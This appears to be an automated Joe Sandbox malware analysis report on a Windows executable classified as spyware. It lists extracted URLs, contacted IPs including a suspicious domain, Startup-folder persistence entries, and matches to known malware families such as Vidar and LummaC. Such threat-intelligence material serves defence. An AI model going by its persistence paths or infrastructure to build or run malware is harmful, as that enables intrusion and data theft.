http://isecure-a.reneelab.com/webapi.php?code=	RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D	RescueCDBurner.exe, 00000003.00000002.1665622100.000000006CF79000.00000002.00000001.01000000.00000009.sdmp, RescueCDBurner.exe, 00000004.00000002.1725993720.000000006D2A9000.00000002.00000001.01000000.00000013.sdmp	false		high
https://bamarelakij.site:443	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2450644579.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000002.2478776983.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac	RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo	RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reneelab.com	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://ntp.msn.com/	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations/	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2300271592.0000000008027000.00000004.00000001.00020000.00000000.sdmp	false		high
http://bugreports.qt-project.org/	RescueCDBurner.exe, 00000003.00000002.1665622100.000000006CF79000.00000002.00000001.01000000.00000009.sdmp, RescueCDBurner.exe, 00000004.00000002.1725993720.000000006D2A9000.00000002.00000001.01000000.00000013.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.com.cn/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.pl/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://img.s-msn.com/tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=tLast-Modified:	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.reneelab.comwww.reneelab.comhttp://https://0	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://xml.org/sax/features/namespaces	RescueCDBurner.exe, 00000003.00000002.1665955800.000000006E8F9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000003.1645395766.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1725814080.000000006D1D9000.00000002.00000001.01000000.00000014.sdmp	false		high
http://isecure.reneelab.com.cn/webapi.php?code=	RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vmware.com/0/	RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://downloads.reneelab.com/passnow/passnow_	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor	24EPV9vjc5.exe, 00000001.00000000.1603651664.00000000009DB000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmp, 24EPV9vjc5.exe, 00000002.00000000.1610817388.0000000000BBB000.00000002.00000001.01000000.00000005.sdmp	false		high
http://www.???.xx/?search=%s	RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newst	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.126.116.98	unknown	United States	20940	AKAMAI-ASN1EU	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
172.217.18.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
13.89.178.27	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
172.67.174.91	bamarelakij.site	United States	13335	CLOUDFLARENETUS	false
18.244.18.122	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
3.171.139.66	unknown	United States	16509	AMAZON-02US	false
104.126.116.26	unknown	United States	20940	AKAMAI-ASN1EU	false
2.23.227.202	unknown	European Union	8781	QA-ISPQA	false
104.126.116.65	unknown	United States	20940	AKAMAI-ASN1EU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
184.51.149.177	unknown	United States	20940	AKAMAI-ASN1EU	false

Private

IP
192.168.2.8

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586712
Start date and time:	2025-01-09 14:40:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	24EPV9vjc5.exe renamed because original name is a hash value
Original Sample Name:	c5056ac95a2002bc08cb0ec8dbf064f78dff400642ec1a6fc2a132984a7c1d99.exe
Detection:	MAL
Classification:	mal92.spyw.evad.winEXE@64/275@21/16
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 116 Number of non-executed functions: 270
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 142.250.186.110, 13.107.6.158, 2.16.168.107, 2.16.168.120, 20.56.187.20, 88.221.110.195, 88.221.110.179, 2.23.227.208, 2.23.227.215, 2.23.227.221, 2.23.209.12, 2.23.209.9, 2.23.209.4, 2.23.209.15, 2.23.209.17, 2.23.209.8, 2.23.209.10, 2.23.209.16, 2.23.209.6, 13.74.129.1, 13.107.21.237, 204.79.197.237, 172.205.25.163, 142.250.80.35, 142.251.41.3, 172.183.192.109, 20.109.210.53, 23.56.254.164, 94.245.104.56, 20.190.159.0, 23.200.0.6, 13.107.246.40, 104.117.182.41, 23.96.180.189
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, prod-agic-ne-9.northeurope.cloudapp.azure.com, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, arc.msn.com, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, config.edge.skype.com, edge-microsoft-com.dual-a-0036.a-msedge.net, prod-agic-ncu-2.northcentralus.cloudapp.azure.com, bzib.nelreports.n
Execution Graph export aborted for target RescueCDBurner.exe, PID 7536 because there are no executed function
Execution Graph export aborted for target RescueCDBurner.exe, PID 7612 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 24EPV9vjc5.exe

Simulations

Behavior and APIs

Time	Type	Description
08:41:34	API Interceptor	1x Sleep call for process: 24EPV9vjc5.exe modified
08:41:57	API Interceptor	1x Sleep call for process: cmd.exe modified
08:42:11	API Interceptor	18x Sleep call for process: LocalCtrl_alpha_v3.exe modified
14:41:53	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITD530.tmp
14:42:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.159.61.3	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	malw.hta	Get hash	malicious	Branchlock Obfuscator	Browse
	malw.hta	Get hash	malicious	Unknown	Browse
	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse
	Mansourbank Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse
13.89.178.27	lem.exe	Get hash	malicious	Vidar	Browse
	https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document	Get hash	malicious	HTMLPhisher	Browse
	_EXTERNAL_ Action Required_ Access & Approve Closing Document.msg	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse
	phish_alert_sp1_1.0.0.0.eml	Get hash	malicious	Unknown	Browse
	#U051d==.eml	Get hash	malicious	Unknown	Browse
	HrxOpVxK5d.exe	Get hash	malicious	Stealc, Vidar	Browse
	INV00663.docx	Get hash	malicious	HTMLPhisher	Browse
	Axactor Microsoft - Introduksjonsm#U00f8te.msg	Get hash	malicious	EvilProxy	Browse
	EXTERNALInvoice 3388 from Mazzitti Sullivan EAP.msg	Get hash	malicious	Unknown	Browse
20.110.205.119	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse
	random.exe	Get hash	malicious	Unknown	Browse
	random.exe	Get hash	malicious	Unknown	Browse
	over.ps1	Get hash	malicious	Vidar	Browse
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse
104.126.116.98	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, XWorm	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sb.scorecardresearch.com	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	18.244.18.38
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	18.244.18.27
	https://t.co/qNQo33w8wD	Get hash	malicious	HTMLPhisher	Browse	18.244.18.32
	http://indyhumane.org	Get hash	malicious	Unknown	Browse	18.244.18.38
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	18.244.18.32
	w3245.exe	Get hash	malicious	Unknown	Browse	18.244.18.27
	w3245.exe	Get hash	malicious	Unknown	Browse	18.244.18.32
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	18.173.166.9
	random.exe	Get hash	malicious	Unknown	Browse	13.32.110.104
	random.exe	Get hash	malicious	Unknown	Browse	18.244.18.27
chrome.cloudflare-dns.com	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	162.159.61.3
	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	162.159.61.3
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	172.64.41.3
	Mansourbank Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	162.159.61.3
	w3245.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	Mansourbank Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	94.245.104.56
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	94.245.104.56
	random.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	over.ps1	Get hash	malicious	Vidar	Browse	94.245.104.56
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	Bp4LoSXw83.lnk	Get hash	malicious	Unknown	Browse	94.245.104.56
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
bamarelakij.site	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	172.67.174.91
	w3245.exe	Get hash	malicious	Unknown	Browse	104.21.80.52
	w3245.exe	Get hash	malicious	Unknown	Browse	104.21.80.52

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	20.189.173.28
	https://meliopayments.cloudfilesbureau.com/j319C	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	20.42.73.31
	mpsl.elf	Get hash	malicious	Mirai	Browse	22.170.57.197
	m68k.elf	Get hash	malicious	Mirai	Browse	20.74.19.248
	arm.elf	Get hash	malicious	Mirai	Browse	20.64.30.232
	arm7.elf	Get hash	malicious	Mirai	Browse	22.183.20.33
	ppc.elf	Get hash	malicious	Mirai	Browse	20.162.225.223
	spc.elf	Get hash	malicious	Mirai	Browse	22.140.64.179
	sh4.elf	Get hash	malicious	Mirai	Browse	22.238.114.39
CLOUDFLARENETUS	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	172.67.174.91
	https://meliopayments.cloudfilesbureau.com/j319C	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
	http://cipassoitalia.it	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.21.48.1
	m68k.elf	Get hash	malicious	Mirai	Browse	8.44.59.63
	arm7.elf	Get hash	malicious	Mirai	Browse	1.12.64.0
	ppc.elf	Get hash	malicious	Mirai	Browse	1.15.80.127
	sh4.elf	Get hash	malicious	Mirai	Browse	1.12.59.181
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	104.21.48.1
AKAMAI-ASN1EU	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	184.28.190.59
	mpsl.elf	Get hash	malicious	Mirai	Browse	23.78.146.158
	m68k.elf	Get hash	malicious	Mirai	Browse	23.63.23.113
	spc.elf	Get hash	malicious	Mirai	Browse	23.194.118.65
	sh4.elf	Get hash	malicious	Mirai	Browse	23.199.18.240
	x86.elf	Get hash	malicious	Mirai	Browse	23.77.244.206
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	104.70.121.217
	https://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4	Get hash	malicious	Unknown	Browse	23.2.73.221
	https://mo.iecxtug.ru/eoQpd/	Get hash	malicious	Unknown	Browse	2.16.168.11
	https://workdrive.zohopublic.com/writer/open/p369v1c9203e54b114ff78bf68159454d9c26	Get hash	malicious	Unknown	Browse	2.16.168.197
MICROSOFT-CORP-MSN-AS-BLOCKUS	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	20.189.173.28
	https://meliopayments.cloudfilesbureau.com/j319C	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	20.42.73.31
	mpsl.elf	Get hash	malicious	Mirai	Browse	22.170.57.197
	m68k.elf	Get hash	malicious	Mirai	Browse	20.74.19.248
	arm.elf	Get hash	malicious	Mirai	Browse	20.64.30.232
	arm7.elf	Get hash	malicious	Mirai	Browse	22.183.20.33
	ppc.elf	Get hash	malicious	Mirai	Browse	20.162.225.223
	spc.elf	Get hash	malicious	Mirai	Browse	22.140.64.179
	sh4.elf	Get hash	malicious	Mirai	Browse	22.238.114.39

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://identity.thoughtspotlogin.cloud/	Get hash	malicious	HTMLPhisher	Browse	23.206.229.226
	https://identity.login-authenticate.cloud/	Get hash	malicious	HTMLPhisher	Browse	23.206.229.226
	https://www.nwocipuk.com/	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://hl.softbc.net/	Get hash	malicious	Unknown	Browse	23.206.229.226
	https://qr.me-qr.com/PVhBu5SR	Get hash	malicious	Unknown	Browse	23.206.229.226
	Condenast eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://ns8.lutheranph.com/	Get hash	malicious	Unknown	Browse	23.206.229.226
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxsYmJ5tlN1JIFNOQtoSEGkLgECYxMchW4UXMllXUALJmesTsjgTR1H-2FvUTVSSAEe4R1GQy-2Bvbd8Zmmy4leDYmh9UNV6oDPX-2BT4wzcyKrfAdXvv6hKSBoru3q77depPs43qOB1DgUqmMdQP-2BNz7H62jYGp-2BH9nmpPKVjXmtKn9w5STVYGL4aqMBL65ruXSYeXZw-3D-3Didct_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419OCcA-2Bhorh4noX10R0htjc0oQD2shNvY2qd7sBvACS4ZxcOvRGqgf-2FzJzWjtjVb7R-2Fc1EPJdReLV-2BtujCvON-2Bc7V1MBDoLDS-2FjF655eEyLK512HQYbp-2FAbQ3P7q3sD01OmQtuWrJdDi7i9EqNYnB7vGsmi9YvC3tf2fi-2F59j5CgE2Yo8KxAbs4pwwxMvCRmFfOK49lsAVAfn3guJ7HTuaWX	Get hash	malicious	Unknown	Browse	23.206.229.226
	http://ighnjnueuelll.top/1.php?s=mints13%5C	Get hash	malicious	Unknown	Browse	23.206.229.226
	YyVnwn8Zst.exe	Get hash	malicious	DarkWatchman	Browse	23.206.229.226
a0e9f5d64349fb13191bc781f81f42e1	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	172.67.174.91
	digitalisierungskonzept_muster.js	Get hash	malicious	Unknown	Browse	172.67.174.91
	NvOxePa.exe	Get hash	malicious	LummaC	Browse	172.67.174.91
	digitalisierungskonzept_muster.js	Get hash	malicious	Unknown	Browse	172.67.174.91
	h3VYJaQqI9.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.174.91
	s7.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.174.91
	uU6IvUPN39.exe	Get hash	malicious	LummaC	Browse	172.67.174.91
	P2V7Mr3DUF.exe	Get hash	malicious	LummaC	Browse	172.67.174.91
	v3tb7mqP48.exe	Get hash	malicious	LummaC	Browse	172.67.174.91

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	w3245.exe	Get hash	malicious	Unknown	Browse
	9mauyKC3JW.exe	Get hash	malicious	Unknown	Browse
	ATLEQQXO.exe	Get hash	malicious	Unknown	Browse
	ATLEQQXO.exe	Get hash	malicious	Unknown	Browse
	upgrade.hta	Get hash	malicious	DarkVision Rat	Browse
	MiJZ3z4t5K.exe	Get hash	malicious	Unknown	Browse
	UolJwovI8c.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\003849b8-effd-4de1-8b54-e33556127a52.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44731
Entropy (8bit):	6.096830473240379
Encrypted:	false
